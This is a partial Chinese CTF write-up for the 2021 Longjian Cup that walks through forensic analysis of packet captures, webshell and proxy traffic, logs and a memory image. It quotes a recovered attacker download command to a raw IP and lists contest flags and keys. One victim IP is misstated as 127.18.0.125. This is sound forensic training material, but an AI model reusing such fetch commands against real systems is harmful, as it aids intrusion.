2021陇剑杯部分WP

写在前面的话，结局排名离谱，最后两分钟直接掉了70多名，排出100以外…很久没有打比赛了，但是也没想到国内的CTF环境已经差到这种地步了，另外就是题目都挺好，个别的题目暂时这里不给出解题过程，见谅

签到

操作内容：
看请求包，http请求返回403

Jwt

操作内容：

1. 看cookie，jwt格式
2. 找个在线解jwt的网站，将cookie解码，注意不要解登录失败那个，解登陆成功的
3. 看流量包。alert（“root”）
4. wireshark打开，包序号103 109这两个包，将文件都试下
5. 包序号109，用echo写了个makefile,能看到so的名字
6. 包序号 129，/etc/pam.d/common-auth

Webshell

操作内容：
3.1追踪tcp流，第5流得到密码

3.2黑客修改了一个日志文件，文件的绝对路径为_____________。（请确认绝对路径后再提交）
追踪第31流的tcp流，然后看http报文，得到当前绝对路径，然后拼上这个log的名字

3.3黑客获取webshell之后，权限是______
查看whoami的返回结果，（不过一般猜也能猜到是www-data）

3.4黑客写入的webshell文件名是_____________。
后面访问的1.php即是webshell文件

3.5黑客上传的代理工具客户端名字是_____________。（如有字母请全部使用小写）
查看post内容，urldecode解码后，base64解码键为j680……的值的内容（根据代码内容，有一个substr，需要去除开头两个字符。）解码得到frpc.ini

3.6黑客代理工具的回连服务端IP是_____________。
3.7黑客的socks5的连接账号、密码是______。（中间使用#号隔开，例如admin#passwd）
十六进制解码键为xa5d……的值，得到所有信息，包括回连IP、回连端口、用户名、密码，代理插件等等

日志分析

操作内容：
1．看流量www.zip

2. access.log，发现了写…/…/…/…/…/…/…//tmp/sess_car字段，判断文件/tmp/sess_car
3. 读文件使用的类是SplFileObject

流量分析

操作内容：
分析pcap流量包，主机ip应该是172.18.0.1，可以看到很多UDP协议的包。在看包内容的时候，注意到UDP包头都是P05=，而且有的是有base64，也有乱码的包。P05=后面都是00 00 00 00和01 00 00 00，其中00的长度是32、01的长度是16，可能是认证。

根据长度为16猜测可能是aes，用长度16的base64（即P05=后面是01 00 00 00的）作为aes key解密发现解密成功了，02 00 00 00对应的包里面都有一个可见字符，其中受害IP172.18.0.125有命令：wget http://147.182.251.98/d.sh;所以第一问为127.18.0.125，第二问密钥就是18217号包里的DtX0GScM9dwrgZht，第三问ip即为147.182.251.98（udp.stream eq 85）

内存分析

操作内容：
6.1 使用工具volatility（kali自带）
imageinfo指令获取系统信息

直接使用lsadump指令查看最后登录的用户

得到flag
flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

6.2

filescan 指令扫描文件
可以把输出内容保存到新文本文件中便于查看

找到HUAWEI P40

使用dumpfiles指令提取文件

Kali中可以直接从dat文件中解压得到备份数据包文件夹

打开发现为加密文件

查到可以使用华为的数据包解密工具
https://github.com/RealityNet/kobackupdec
使用指令python3 kobackupdec.py -vvv 密码 加密文件夹 解密存储目录
根据提示 密码为上题中的flag空格换成_
W31C0M3_T0_THiS_34SY_F0R3NSiCX
即可得到解密后的文件夹（此处为a）

解密文件位于 a\storage\MediaTar\images
打开images0.tar压缩包 得到图片flag

简单日志分析

操作内容：
1.2根据流量包
3 查看流量请求包的一段base64。编码 解码会发现进行了反弹shell操作

SQL注入

操作内容：

1. 注入语句采用if语句，如果成功返回正常界面，bool盲注
2. 找注数据库，表，字段的语句，取注入每位时的边界值，拼接
3. 找注flag值的语句，取注入每位时的边界值，拼接。

WIFI

操作内容：

暂不放出

ios

操作内容：
1.通过查看内部ip192.168.1.8与外部3.128.156.159通信的流量
2.wget 发现了使用的工具

3.根据使用文档和流量可知密钥为hack4sec

4.一个个数的。。正则提取下就出来了。746558f3-c841-456b-85d7-d6c0f2edabb2

5.在之前看的时候就觉得有些许不对劲，到了第五题发现果然是个疑似扫描的东西,继续往下翻，到这里结束，得出10-499

6.暂不公布
7.查看ip192.168.1.8对内网的异常流量可以发现。
8.查看log文件，小马的参数即是密码

机密内存

操作内容：
暂不公布